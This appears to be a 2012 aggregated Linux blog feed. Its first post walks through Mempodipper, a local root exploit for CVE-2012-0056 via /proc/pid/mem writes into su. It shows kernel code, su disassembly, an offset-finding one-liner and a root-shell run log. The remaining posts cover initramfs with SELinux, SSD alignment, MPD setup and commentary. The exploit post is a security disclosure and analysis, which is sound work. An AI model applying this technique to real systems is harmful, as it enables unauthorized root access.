Posts for Sunday, January 22, 2012

Linux Local Privilege Escalation via SUID /proc/pid/mem Write

Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for directly reading and writing process memory by seeking to the same addresses as in the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the prior #ifdef that disabled write support for arbitrary process memory was removed: anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. This means that all Linux kernels >=2.6.39 are vulnerable, up until the fix commit for it a couple days ago. Let’s take the old kernel code step by step and learn what’s the matter with it.

When /proc/pid/mem is opened, this kernel code is called:

static int mem_open(struct inode* inode, struct file* file)
{
	file->private_data = (void*)((long)current->self_exec_id);
	/* OK to pass negative loff_t, we can catch out-of-range */
	file->f_mode |= FMODE_UNSIGNED_OFFSET;
	return 0;
}

There are no restrictions on opening; anyone can open the /proc/pid/mem fd for any process (subject to the ordinary VFS restrictions). The open handler simply notes the opening process’s self_exec_id and stores it away for checking later during reads and writes.

Writes (and reads), however, have permissions checking restrictions. Let’s take a look at the write function:

static ssize_t mem_write(struct file * file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
	/* unimportant code removed for blog post */
	struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);
	/* unimportant code removed for blog post */
	mm = check_mem_permission(task);
	copied = PTR_ERR(mm);
	if (IS_ERR(mm))
		goto out_free;
	/* unimportant code removed for blog post */
	if (file->private_data != (void *)((long)current->self_exec_id))
		goto out_mm;
	/* unimportant code removed for blog post
	 * (the function here goes on to write the buffer into the memory)
	 */
}

So there are two relevant checks in place to prevent against unauthorized writes: check_mem_permission and self_exec_id. Let’s do the first one first and second one second.

The code of check_mem_permission simply calls into __check_mem_permission, so here’s the code of that:

static struct mm_struct *__check_mem_permission(struct task_struct *task)
{
	struct mm_struct *mm;

	mm = get_task_mm(task);
	if (!mm)
		return ERR_PTR(-EINVAL);

	/*
	 * A task can always look at itself, in case it chooses
	 * to use system calls instead of load instructions.
	 */
	if (task == current)
		return mm;

	/*
	 * If current is actively ptrace'ing, and would also be
	 * permitted to freshly attach with ptrace now, permit it.
	 */
	if (task_is_stopped_or_traced(task)) {
		int match;
		match = (ptrace_parent(task) == current);
		if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))
			return mm;
	}

	/*
	 * No one else is allowed.
	 */
	return ERR_PTR(-EPERM);
}

There are two ways that the memory write is authorized. Either task == current, meaning that the process being written to is the process writing, or current (the process writing) has esoteric ptrace-level permissions to play with task (the process being written to). Maybe you think you can trick the ptrace code? It’s tempting. But I don’t know. Let’s instead figure out how we can make a process write arbitrary memory to itself, so that task == current.

Now naturally, we want to write into the memory of suid processes, since then we can get root. Take a look at this:

$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy

su will spit out whatever text you want onto stderr, prefixed by “Unknown id:”. So, we can open a fd to /proc/self/mem, lseek to the right place in memory for writing (more on that later), use dup2 to couple together stderr and the mem fd, and then exec to su $shellcode to write a shell spawner into the process memory, and then we have root. Really? Not so easy.

Here the other restriction comes into play. After it passes the task == current test, it then checks to see if the current self_exec_id matches the self_exec_id that the fd was opened with. What on earth is self_exec_id? It’s only referenced a few places in the kernel. The most important one happens to be inside of exec:

void setup_new_exec(struct linux_binprm * bprm)
{
	/* massive amounts of code trimmed for the purpose of this blog post */
	/* An exec changes our domain. We are no longer part of the thread
	   group */
	current->self_exec_id++;
	flush_signal_handlers(current, 0);
}

self_exec_id is incremented each time a process execs. Here it ensures that you can’t open the fd in a non-suid process, dup2, and then exec into a suid process… which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?

Here’s how to get around it. We fork a child, and inside of that child, we exec to a new process. The initial child fork has a self_exec_id equal to its parent. When we exec to a new process, self_exec_id increments by one. Meanwhile, the parent itself is busy execing to our shellcode writing su process, so its self_exec_id gets incremented to the same value. So what we do is — we make this child fork and exec to a new process, and inside of that new process, we open up a fd to /proc/parent-pid/mem using the pid of the parent process, not our own process (as was the case prior). We can open the fd like this because there is no permissions checking for a mere open. When it is opened, its self_exec_id has already incremented to the right value that the parent’s self_exec_id will be when we exec to su. So finally, we pass our opened fd from the child process back to the parent process (using some very black unix domain sockets magic), do our dup2ing, and exec into su with the shell code.

There is one remaining objection. Where do we write to? We have to lseek to the proper memory location before writing, and ASLR randomizes process address spaces, making it impossible to know where to write to. Should we spend time working on more cleverness to figure out how to read process memory, and then carry out a search? No. Check this out:

$ readelf -h /bin/su | grep Type
  Type:                              EXEC (Executable file)

This means that su does not have a relocatable .text section (otherwise it would spit out “DYN” instead of “EXEC”). It turns out that su on the vast majority of distros is not compiled with PIE, disabling ASLR for the .text section of the binary! So we’ve chosen su wisely. The offsets in memory will always be the same. So to find the right place to write to, let’s check out the assembly surrounding the printing of the “Unknown id: blabla” error message.

It gets the error string here:

  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 (dcgettext@plt)

And then writes it to stderr:

  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 (stderr)
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 (__fprintf_chk@plt)

Closes the log:

  4036a3:       e8 f0 eb ff ff          callq  402298 (closelog@plt)

And then exits the program:

  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 (exit@plt)

We therefore want to use 0x402178, which is the exit function it calls. We can, in an exploit, automate the finding of the exit@plt symbol with a simple bash one-liner:

$ objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'

So naturally, we want to write to 0x402178 minus the number of letters in the string “Unknown id: ”, so that our shellcode is placed at exactly the right place.

The shellcode should be simple and standard. It sets the uid and gid to 0 and execs into a shell. If we want to be clever, we can preserve stderr: before dup2ing the memory fd onto stderr, we dup stderr to a spare fd, and then in the shellcode we dup2 that spare fd back onto stderr.

In the end, the exploit works like a charm with total reliability:

CVE-2012-0056 $ ls
mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper 
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root

There is also a video of it in action.

As always, thanks to Dan Rosenberg for his continued advice and support. I’m currently not releasing any source code, as Linus only very recently patched it. After a responsible amount of time passes or if someone else does first, I’ll publish. If you’re a student trying to learn about things or have otherwise legitimate reasons, we can talk.

Update: evidently, based on this blog post, ironically, some other folks made exploits and published them. So, here’s mine. I wrote the shellcode for 32-bit and 64-bit by hand. Enjoy!

Update 2: as it turns out, Fedora very aptly compiles their su with PIE, which defeats this attack. They do not, unfortunately, compile all their SUID binaries with PIE, and so this attack is still possible with, for example, gpasswd. The code to do this is in the “fedora” branch of the git repository, and a video demonstration is also available.

{As always, the work here is strictly academic, and is not intended for use beyond research and education.}


Best background music ever.

From Orisinal: Morning Sunshine:

emerge -av swftools
swfextract -s 31 carrot.swf -o carrot.mp3
mplayer -loop 0 carrot.mp3

Or replace with any other Orisinal song :)

Orisinal - Carrot Track

Note: -s 31 depends on the sound index number, which may be different – do swfextract foo.swf to check.


Posts for Friday, January 20, 2012

Gnome Documentation – A second chance

Perhaps not all is lost. This walkthrough/reference appears to be a more interesting (official) take on how to program Gnome GTK+.

Posts for Thursday, January 19, 2012


Hadron and Turkish [translated from Turkish]

There was no problem until I saw the comments on Özgürlükİçin.. Actually there still isn’t, but there is one point I want to make about Hadron.

  • Why is there no Turkish support in Hadron? 

Why should there be? I’m genuinely asking, and I await your comments. Why should we add Turkish support?

We’ve been in the #hadron channel for a year, explaining the project in Turkish and English to whoever joins. There is a wiki with half-finished Turkish content, and anyone who wants to can pick it up and continue it. (How many people ever showed up is a separate question, but anyway.)

There are two or three of us; that’s pronounced “two” and “three”.. We don’t draw a salary either; in our free time, instead of playing games, we build experimental things. I’m asking, really: instead of improving the packages in the main repository of a package management system “built from scratch”, adding more packages, keeping them up to date, and turning it into a package management system that can genuinely be useful to the end user[1], why should we bother with Turkish documentation for the “Turkish Linux Community”[2], most of whom will drop in on a whim and wander off again saying “aww, this one doesn’t have compiz”?

Maybe Hadron really will “end up like the others”; you may be right. But nobody is telling you “use this distro, it’s perfect, everything is possible with Hadron!!!1!”. We’re still developing it; it isn’t finished; forget finished, it hasn’t even properly started :) Instead of going “meh, there’s no Turkish in this, it’s junk”, is it really so hard to think for a second and conclude “hmm, so it isn’t ready enough for me to use yet”?

If you want to understand what we’re trying to do with Hadron, look into how Gentoo works, what a USE flag is, what a package manager does, how a program is compiled, and similar bits and pieces. Our door is wide open to anyone who wants to test/develop/translate (and not just into Turkish, but into any language spoken on Earth). The door has been left open so long that we’ve caught a cold..

[1] We mean an end user who knows what they’re doing
[2] Okay, okay, you of course are the exception, my friend..

Zabbix 1.8.9 Debian Squeeze Backport

I was beginning to get hit by many bad things in the Debian Squeeze zabbix 1.8.2 package.  If you aren’t aware, zabbix is a nifty data center monitoring system and is only slightly annoying compared to most other systems which are very annoying to set up and use.

Most notably, this package will safely run on PostgreSQL 9.1 from squeeze-backports and contains many performance improvements. It should be a drop-in upgrade for the distro package.

Get it here:


Posts for Wednesday, January 18, 2012

FOSDEM from Paris

I just moved to Paris, which means I’m finally in the right proximity at the right time for attending an open source conference. I’m not sure what the scoop is with the Parisian KDE community — if it exists or is vibrant, if there’s camaraderie, or what the situation is. But, in case there is a good vibe brewing inside the Paris OSS community, what do you say we all band together to attend FOSDEM? Leave our city for Brussels in a festive caravan on Friday night (or possibly just a train) and come back Sunday night? If there’s interest, email me at jason [at] zx2c4 dot com or leave a comment below.

Qt Documentation

Gnome documentation needs to be more like Qt’s.

The ball’s in Gnome’s court now. They really need to step up their game.

Thanks to the kind commenter on the last post for pointing this out.

If you’re in Europe, go to Monki Gras

To my European readers: if you care about the impact of social technologies like Git (and GitHub) & how they’re transforming software development, or the impact of social technology on communities, and you enjoy good beer, you need to be at Monki Gras. I just posted over at my RedMonk blog about how the previous conference in the series, Monktoberfest, was the best conference of my life. And I’ve been to many.

Monki Gras is Feb. 1–2 in London. The timing’s perfect to stop by just before FOSDEM (and that’s exactly what I’m doing). Registration is dirt-cheap, speakers are universally top-notch, and you’ll also get some world-class beers in the package.

Tagged: community, development, gentoo

Posts for Tuesday, January 17, 2012

Program or be programmed?

Yesterday Douglas Rushkoff, who always manages to get me to think, published a column titled “Why I am learning to code and you should, too” in which he outlined his reasons for signing up with Codecademy (Codecademy is a service that offers free online exercises teaching complete newbies to program in JavaScript):

Learning to code means being able to imagine a new way of using the camera in your iPhone, or a new way for people to connect to each other, and then being able to bring that vision to reality.

He wrote about a similar perspective in his book titled “Program or be programmed”, which I reviewed here and which I totally ripped off for this post’s title. The idea is simple: More and more of our daily life gets digitalized, processed by algorithms and programs and we have to live with whatever those magic black boxes provide us with. And if we have no clue about how programming and algorithmic thinking works, we will have no clue about how the data some services spew our way might have been created and how we could influence it. Not being able to program makes us very powerless in a world where most things are done by programs, programs other people wrote.

Now we could force everyone to learn at least one programming language (in fact that topic came up in the discussion around my recent [German] talk borrowing the same title as this blogpost) where Jens Ohlig coined the brilliant phrase: “Maybe programming is this generation’s Latin?”

But that perspective is in a certain way very elitist. I know how to program, and you reading this blog probably do, too. But many, many people don’t, and not because of laziness or a lack of caring. Learning how to program takes time (time you can’t spend earning your livelihood), considerable resources (you need a computer, for example, and probably an internet connection) and a certain mindset not everybody has. There are artists who program and use those tools to create brilliant pieces of beauty, just as there are financial analysts who couldn’t code a simple Excel macro to save their lives. But it would be ignorant to deny that certain personality traits do make learning programming easier: Programming is very formal, structured and very abstract. You need a very analytical mind to learn it properly.

I don’t deny Rushkoff’s or Ohlig’s train of thought. In fact I deeply support it. But I don’t think that throwing a Javascript or Python tutorial people’s way will help anyone who’s not already halfway there.

In a certain way I think Facebook is a great case study here. Internet savvy people often joke about people whose whole internet is Facebook (just as people joked about the internet being more than “the web” before). The fact is: You might not like Facebook for whatever reasons (privacy, blue design, the interface, data portability or whatever) but when it comes to keeping track of your contacts, managing event invitations, chatting and sharing funny pictures Facebook just works. Yes, many are not using it “right” or “smart” or get all out of it they could, but they get the stuff they care about done.

And that is what we have to start building. In the discussions around my talk Michael Seemann brought up the open source movement as something he thought provided a good model for our future: In open source not everybody checks the code, very few do, but everybody could (or pay someone to do it for them). He proposed to create data management and “programming” tools in an open source way that hides all of the ugliness from the user and empowers them to get stuff done quickly even if they don’t understand the basics.

For a long time I have kinda argued against that idea. I thought that we should make programming languages simple (which is why I like Python) but that abstracting away too much of the internals would still leave people powerless. And to a certain degree I was and am right: People only using the abstracted tool will never be as powerful as the people using all of the potential a “real” programming language provides.

But, and here I changed my perspective, let’s come back to the Facebook example: Yes people whose internet is Facebook miss out on many brilliant things. But they are online, they can talk to many many people all over the world, can find new interests and broaden their horizon.

In a certain way it is just as it is with writing. Yes, “everybody” can write in the first world countries (not really, there are people who just can’t learn it properly) but not everybody can write a great novel. Hell many people can’t even write a semi-structured text summarizing their thoughts on a certain matter.

I think we’ll have to define our “minimum skill level of programming” that we teach people. That doesn’t mean that we should force all our kids through C, Java or Ruby courses. Maybe a simpler, more generic, less powerful language could be used. Something that kinda explains how dataflows work and how computers “think”, without dealing with functions and memory allocation?

I am not a teacher. I’m also not great at explaining things. But I do believe that teachers and hackers should maybe see if they can come up with a middle ground between “I can click the login button on the Facebook page” and “I write my own kernel in assembler”.

How do you think that middle ground could look? Do you believe we should teach everybody in school programming? I’d love to read your comments!


Gnome Documentation

Why does developer documentation have to be SO boring? I mean, I realize as a computer programmer I should totally be loving this stuff like it’s the most interesting thing in the world, but as much as I lie to myself like that, I just can’t bring myself to believe it. It’s horrible. It’s bland. It’s dry. Sometimes I think perhaps it’s the formatting. I, for example, don’t mind reading the Java 7 API when programming in Java.

Maybe I just wasn’t cut out for this stuff. Who knows?

Posts for Monday, January 16, 2012


Music Player Daemon on OS X

I use a Mac Mini with OS X 10.5.8 as a media center connected to my TV and I wanted to install Music Player Daemon on it so I could control the music remotely from my laptop or phone. I mostly followed the OS X guide from MPD’s wiki to do it but I ran into some problems while trying to daemonize mpd.

I got the following error while running mpd without --no-daemon:

The process has forked and you cannot use this CoreFoundation functionality safely. You MUST exec().

When I ran mpd --no-daemon everything was fine though. So in order to “solve” this problem I’ve changed the plist file to include a screen invocation.

My mpd.plist looks like this now:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "">
<plist version="1.0">
        <string>screen</string> <!-- path to screen -->
        <string>/opt/local/bin/mpd</string> <!-- path to MPD -->
        <string>/Users/kargig/.mpd/mpd.conf</string> <!-- path to MPD config -->
        <string>/opt/local/bin/mpd</string> <!-- path to MPD, again -->
        <string>/Users/kargig/.mpd/mpd.conf</string> <!-- path to MPD config, again -->

So launchctl calls daemondo, which calls screen, which runs mpd --no-daemon, so mpd doesn’t crash.

I use mpdscribble for scrobbling my music. Clients-wise, I use Theremin on OS X, Gnome Music Player Client/gmpc on Debian Linux and MPDroid on Android. And all those connections are over IPv6 of course, over my LAN’s Unique Local Addresses to be exact; mpd and all the clients listed above work fine with IPv6.

 # lsof -n -i | grep ESTABLISHED | grep 6600
mpd       43025         kargig   12u  IPv6 0x49c719c      0t0    TCP [fdbf:aaaa:aab0:447d:216:XXff:feaa:11XX]:6600->[fdbf:aaaa:aab0:447d:222:XXff:fe1e:d8XX]:48703 (ESTABLISHED)
mpd       43025         kargig   15u  IPv6 0x3127cd4      0t0    TCP [fdbf:aaaa:aab0:447d:216:XXff:feaa:11XX]:6600->[fdbf:aaaa:aab0:447d:fadb:XXff:fe4f:aXX]:51113 (ESTABLISHED)

Apart from MPD’s wiki there’s another nice blog post you can read to help you install mpd on OS X, Integrating MPD with OS X.
For general reference on setting up mpd, Arch Linux has a fine wiki entry.

Posts for Sunday, January 15, 2012


Trying out initramfs with selinux and grsec

I’m no fan of initramfs. All my systems boot up just fine without it, so I often see it as an additional layer of obfuscation. But there are definitely cases where initramfs is needed, and from the looks of it, we might be needing to push out some documentation and support for initramfs. Since my primary focus is to look at a hardened system, I started playing with initramfs together with Gentoo Hardened, grSecurity and SELinux. And what a challenge it was…

But first, a quick introduction to initramfs. The Linux kernel has supported initrd images for quite some time. These images are best seen as loopback-mountable images containing a whole file system that the Linux kernel boots as the root device. On this initrd image, a set of tools and scripts then prepare the system and finally switch towards the real root device. The initrd feature was often used when the root device is a network-mounted location or a file system that requires additional activities (like an encrypted file system, or LVM). But it also had some difficulties.

Using a loopback-mountable image means that this is seen as a full device (with file system on it), so the Linux kernel also tries caching the files on it, which leads to some unwanted memory consumption. It is a static environment, so it is hard to grow or shrink it. Every time an administrator creates an initrd, he needs to carefully design (capacity-wise) the environment not to request too much or too little memory.

Enter initramfs. The concept is similar: an environment that the Linux kernel boots as a root device which is used to prepare for booting further from the real root file systems. But it uses a different approach. First of all, it is no longer a loopback-mountable image, but a cpio archive that is used on a tmpfs file system. Unlike initrd, tmpfs can grow or shrink as necessary, so the administrator doesn’t need to plan the capacity of the image. And because it is a tmpfs file system, the Linux kernel doesn’t try to cache the files in memory (as it knows they already are in memory).

There are undoubtedly more advantages to initramfs, but let’s stick to the primary objective of this post: talk about its implementation on a hardened system.

I started playing with dracut, a widely popular tool to create initramfs archives (and the one suggested on the gentoo development mailing list). It uses a simple, modular approach to building initramfs archives. It has a base, which includes a small init script and some device handling (based on udev), and modules that you can add depending on your situation (such as adding support for RAID devices, LVM, NFS-mounted file systems etc.)

On a SELinux system (using a strict policy, enforcing mode) running dracut in the sysadm_t domain doesn’t work, so I had to create a dracut_t domain (which has been pushed to the Portage tree yesterday). But other than that, it is for me sufficient to call dracut to create an initramfs:

# dracut -f "" 3.1.6-hardened

My grub then has an additional set of lines like so:

title Gentoo Linux Hardened (initramfs)
root (hd0,0)
kernel /boot/vmlinuz-3.1.6-hardened root=/dev/vda1 console=ttyS0 console=tty0
initrd /boot/initramfs-3.1.6-hardened.img

Sadly, the bugger didn’t boot. The first problem I hit was that the Linux kernel I boot has chroot restrictions in it (grSecurity). These restrictions further tighten chroot environments so that it is much more difficult to “escape” a chroot. But dracut, and probably all others, use chroot to further prepare the bootup and eventually switch to the chrooted environment to boot up further. Having the chroot restrictions enabled effectively means that I cannot use initramfs environments. To work around, I enabled sysctl support for all the chroot restrictions and made sure that their default behavior is to be disabled. Then, when the system boots up, it enables the restrictions later in the boot process (through the sysctl.conf settings) and then locks these settings (thanks to grSecurity’s grsec_lock feature) so that they cannot be disabled anymore later.
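As an illustration of that boot-time flow, a sysctl.conf fragment of the kind described might look like this (sysctl names are from grsecurity’s sysctl interface; which ones exist depends on the kernel configuration):

```text
# Re-enable the chroot restrictions after the initramfs has switched root
kernel.grsecurity.chroot_deny_chroot = 1
kernel.grsecurity.chroot_deny_mount = 1
kernel.grsecurity.chroot_deny_chmod = 1
kernel.grsecurity.chroot_deny_mknod = 1
# Then lock the grsecurity sysctls so they cannot be flipped back off
kernel.grsecurity.grsec_lock = 1
```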

But no, I did get further, up to the point that either the openrc init is called (which tries to load in the SELinux policy and then breaks) or that the initramfs tries to load the SELinux policy – and then breaks. The problem here is that there is too much happening before the SELinux policy is loaded. Files are created (such as device files) or manipulated, chroots are prepared, udev is (temporarily) ran, mounts are created, … all before a SELinux policy is loaded. As a result, the files on the system have incorrect contexts and the moment the SELinux policy is loaded, the processes get denied all access and other privileges they want against these (wrongly) labeled files. And since after loading the SELinux policy, the process runs in kernel_t domain, it doesn’t have the privileges to relabel the entire system, let alone call commands.

This is currently where I’m stuck. I can get the thing to boot up if you temporarily work in permissive mode. When the openrc init is eventually called, things proceed as usual and the moment udev is started (again, now from the openrc init) it is possible to switch to enforcing mode. All processes are running by then in the correct domain and there do not seem to be any files left with wrong contexts (since the initramfs is not reachable anymore and the device files in /dev are now set again by udev, which is SELinux aware).

But if you want to boot up in enforcing straight away, there are still things to investigate. I think I’ll need to put the policy in the initramfs as well (which has the huge downside that every update on the policy requires a rebuild of the initramfs as well). In that case I can load the policy early up the chain and have the initramfs work further running in an enforced situation. Or I completely regard the initramfs as an “always trusted” environment and wait for openrc’s init to load the SELinux policy. In that case, I need to find a way to relabel the (temporarily created) /dev entries (like console, kmsg, …) before the policy is loaded.

Definitely to be continued…

Posts for Friday, January 13, 2012

Valadate git repository

The Valadate repository is actually on Yorba’s website, which, if you check, shows that the project is far from dead, despite what the gitorious project page would have you believe.

Valadate can be found here:

Posts for Thursday, January 12, 2012


Yup, boredom creates another distro

Hadron GNU/Linux 1.0 (a.k.a. Dennis Ritchie) is out. So you’ll probably say “what?”.

We’re trying to create a distro which is source-based, fast and follows KISS principles. Hadron’s package manager is lpms, which was written from scratch (in Python) and uses portage-like trees as software repositories. We’re in no hurry. And I do mean really few people when I say “we”.

We also have a wiki and a channel named #hadron on freenode IRC server. Please feel free to try and hang around. We need more manpower.


Update: I saw some comments about Hadron like “What is the point”. Take it easy, guys. We didn’t say it’s the best lion in the arena. We’re just bored :)

HowTo: Use a config.vapi file with CMake

If you want to use a config.vapi file with your Vala project here are the basics.

  1. Setup your CMake files in your project. I use these.
  2. In your main CMakeLists.txt file you’ll need to add:
  3. Finally, you’ll need to, of course, create a vapi directory.
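For what it’s worth, the snippet that step 2 refers to presumably looked something like the following. This is a hypothetical sketch assuming Jakob Westhoff’s Vala CMake macros (vala_precompile), with placeholder file and package names:

```cmake
# Hypothetical: hand the extra vapi to the Vala precompile step
vala_precompile(VALA_C
    src/main.vala
PACKAGES
    gtk+-3.0
CUSTOM_VAPIS
    ${CMAKE_SOURCE_DIR}/vapi/config.vapi
)
```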

Sadly, during my first adventure in the Vala world it took me quite a while to figure that out. The kind of thing that makes you feel retarded.

Posts for Wednesday, January 11, 2012


Linux SSD partition alignment tips

Yes, this is another post on the internet about properly aligning your SSD partitions on Linux. It’s mostly my notes that I have gathered from other posts around the net. Please read the whole post before starting to create partitions on your SSD.

I bought myself a brand new SSD for Xmas, an OCZ Agility 3 120GB. But I also bought a CDROM caddy so that I could replace my useless macbook CDROM drive; the last time I used it was probably 2009 or 2010. So my plan was to put the old, original macbook SATA hard disk inside the caddy and use the SSD as the primary one. Sounds easy, right? Well, you just need patience, lots of patience, to remove all the necessary screws to get the CDROM drive out and replace it with the caddy. Instructions for this procedure can be found at

Create Partitions on the SSD disk
Before one begins some definitions!

Heads = Tracks per cylinder
Sectors = Sectors per track

The goal here is to have the partitions aligned to the SSD’s Erase Block Size.
Googling around the net, I found out that OCZ always uses 512KB as the erase block size. If one runs fdisk with 32 heads and 32 sectors, that makes a cylinder of 32*32 = 1024 sectors. Multiplying by 512 bytes, fdisk’s default sector size, gives 512KB (= 32*32*512) per cylinder: exactly the erase block size that’s needed. So one needs to start fdisk with the following command:
# fdisk -H32 -S32 /dev/sdb
where /dev/sdb is the SSD.

It is very important to remember to start the first partition from the 2nd cylinder. For MS-DOS compatibility, a partition starting at the first cylinder would skip one track, so it would actually start at 32 (sectors) * 512 (bytes) = 16KB, messing up the alignment.
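To make the arithmetic above concrete, here is a quick sanity check (plain Python, just redoing the numbers from the post):

```python
# Redoing the fdisk -H32 -S32 arithmetic from the post.
heads = 32          # tracks per cylinder
sectors = 32        # sectors per track
sector_size = 512   # bytes, fdisk's default unit

# One cylinder = 32 * 32 = 1024 sectors = 512 KiB, the erase block size.
cylinder_bytes = heads * sectors * sector_size
print(cylinder_bytes)  # 524288

# A partition starting at the first cylinder actually begins one track in
# (MS-DOS compatibility), which is not erase-block aligned:
first_track_offset = sectors * sector_size
print(first_track_offset)                        # 16384 (16 KiB)
print(first_track_offset % cylinder_bytes == 0)  # False

# Starting at the 2nd cylinder begins exactly one erase block in:
print(cylinder_bytes % (512 * 1024) == 0)        # True
```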

Then create necessary partitions as needed.

LVM alignment
So, the partitions on the SSD are aligned, but what if one wants to use LVM? Then LVM’s overhead has to be taken into account as well.
To create an aligned PV on the partitions that have already been created, one needs the “--dataalignment” option found in newer versions of the LVM utilities.
# pvcreate --dataalignment 512k /dev/sdb3
To check the alignment use the following command:

# pvs /dev/sdb3 -o+pe_start
  PV         VG   Fmt  Attr PSize   PFree  1st PE 
  /dev/sdb3  ssd  lvm2 a-   111.46g 81.46g 512.00k

Check that “1st PE” matches the alignment that is actually needed (512.00k here).

Proceed creating VGs and LVs as needed.

Formatting Partitions with ext4
There’s no reason to use ext3 on an SSD; one should take advantage of ext4’s SSD features. I prefer 4K as the block size.
For a further explanation of the following formulas read Linux RAID Wiki – RAID setup
stride = chunk size (the erase block size here) / block size = 512KB / 4K = 128
stripe-width is usually calculated with a formula involving multiple disks. Since there’s only one disk in this scenario, stripe-width equals stride.
stripe-width = 128

# mkfs.ext4 -O extent -b 4096 -E stride=128,stripe-width=128 /dev/mapper/ssd-debian
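The stride and stripe-width values passed to mkfs.ext4 follow from simple division; a quick check in Python, using the sizes from the post:

```python
# ext4 stride/stripe-width check: erase block 512 KiB, fs block 4 KiB.
erase_block = 512 * 1024  # bytes
fs_block = 4096           # bytes (-b 4096)

stride = erase_block // fs_block
print(stride)  # 128

# One data disk, so stripe-width equals stride.
stripe_width = stride * 1
print(stripe_width)  # 128
```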

Mounting the partition
To enable SSD TRIM support, which reduces unnecessary writes and thus premature wear, one needs to enable the discard option when mounting the partition. Edit /etc/fstab and add the discard mount option (and noatime if you want to).
/dev/mapper/ssd-deb / ext4 discard,noatime,errors=remount-ro 0 1

Note 1: As of 2.6.37 Linux Kernel supports TRIM on device mapper. Previous kernel versions will report errors upon trying to mount an LVM partition with discard mount option. If you have an older kernel either don’t use LVM on your SSD yet or upgrade your kernel!
Note 2: Read the links posted below for a complete blog post on the TRIM command. Apparently it’s not always the best choice.

That’s basically it…

Extra – copying the old root partition to the new disk

# mkdir /mnt/ssd/
# mount /dev/mapper/ssd-debian /mnt/ssd/
# rsync -aPEHv --exclude=/dev --exclude=/proc --exclude=/sys --exclude=/mnt --exclude=/var/cache/apt/archives/ / /mnt/ssd/
# mkdir /mnt/ssd/dev
# mkdir /mnt/ssd/proc
# mkdir /mnt/ssd/sys
# mkdir /mnt/ssd/mnt
# cp -avp /dev/console /mnt/ssd/dev/
# cp -avp /dev/urandom /mnt/ssd/dev/
# cp -avp /dev/zero /mnt/ssd/dev/
# cp -avp /dev/random /mnt/ssd/dev/
# Edit /mnt/ssd/etc/fstab to change the device names
# Update grub

Using the above commands one avoids copying unneeded directories like /dev, /proc and /sys that will be recreated later. Don’t forget to at least copy the above 4 device nodes into the new /mnt/ssd/dev dir, else the partition won’t be bootable.

1. Aligning Filesystems to an SSD’s Erase Block Size (link goes to since original article has unfortunately disappeared from the web)
2. [linux-lvm] Re: Aligning PVs on SSDs?
3. Aligning an SSD on Linux (excellent article!)
4. ArchWiki – Solid State Drives
5. SSD performance tips for RHEL6 and Fedora
6. Re: [dm-devel] trim support (discard)
7. How to check TRIM is working on your SSD running Linux
8. Impact of ext4’s discard option on my SSD (very useful insight on the TRIM command, read the comments as well)

Thanks fly out to @apoikos for helping me with the CDROM replacement and to @faidonl for his original SSD alignment tips :)

Compiling firefox-9.0 on linux PPC

The good news is that yes, it is possible to compile firefox 8.0 or 9.0 on linux-ppc.

General point of view

The Mozilla foundation stopped supporting the PPC platform for firefox starting with version 4.0. Gentoo ebuilds, quite understandably, followed upstream by removing ppc keywords for all firefox ebuilds >=4.0. Though… I still have [...]

Google+ Your World

So half the Internet is up in arms again because of Google’s recent changes to their search engine: For users with a Google+ account, Google mixes information from the users social network into the search results.

Now we read complaints about how bad that is, how Google’s search results will get worse and the term “Filter Bubble” is being thrown around like it was solving anything. But in fact it is simple.

Google aims to become your one search engine. You might want that or you might not want that, but from a business sense it is perfectly logical. Google indexes a lot of the stuff already out there and tries to gauge its relevance to your searches, but your own data, your shared links and photos as well as the links your contacts posted (and therefore tried bringing to your attention) have been sort of inaccessible to Google’s search engine. This changed.

Why are people upset? It’s mostly due to the wrong belief that there is some sort of objective relevance certain things have in regards to certain queries: For every question there is one best answer. Which is really stupid actually.

When I include “python” in my search terms that usually means that I am looking for programming related results (I use Python a lot) and not snakes or a group of British comedians. My social circle on Google+ reflects that with many python devs in it. So it makes perfect sense for Google to use that information to weed out more irrelevant results for me.

The complaint that Google could use that to manipulate you might have certain merit, but that hasn’t changed through adding the social factor: I have to trust every search engine I use not to hide or show certain results out of malice. If I want to circumvent that, I can use search engine proxies that query the engines anonymously, or build some sort of meta engine that merges the results of different search products. All very valid approaches, but Google’s inclusion of their social network hasn’t changed the problems in this aspect at all.

In the end it’s about time management. I hate searching, cause I wanna do stuff. Searching is just time I have to invest to be able to do stuff, so everything that cuts that time down makes sense to me. I am aware of the dangers of personalized search, which is why I also have a proxied search included in my browser, but I’m not willing to throw away the benefits of a better tailored search engine for some vague “maybe, you never know” dangers.


Posts for Tuesday, January 10, 2012

Configuration Management Software Sucks

Yes.  Configuration Management Software Sucks.  Horribly.

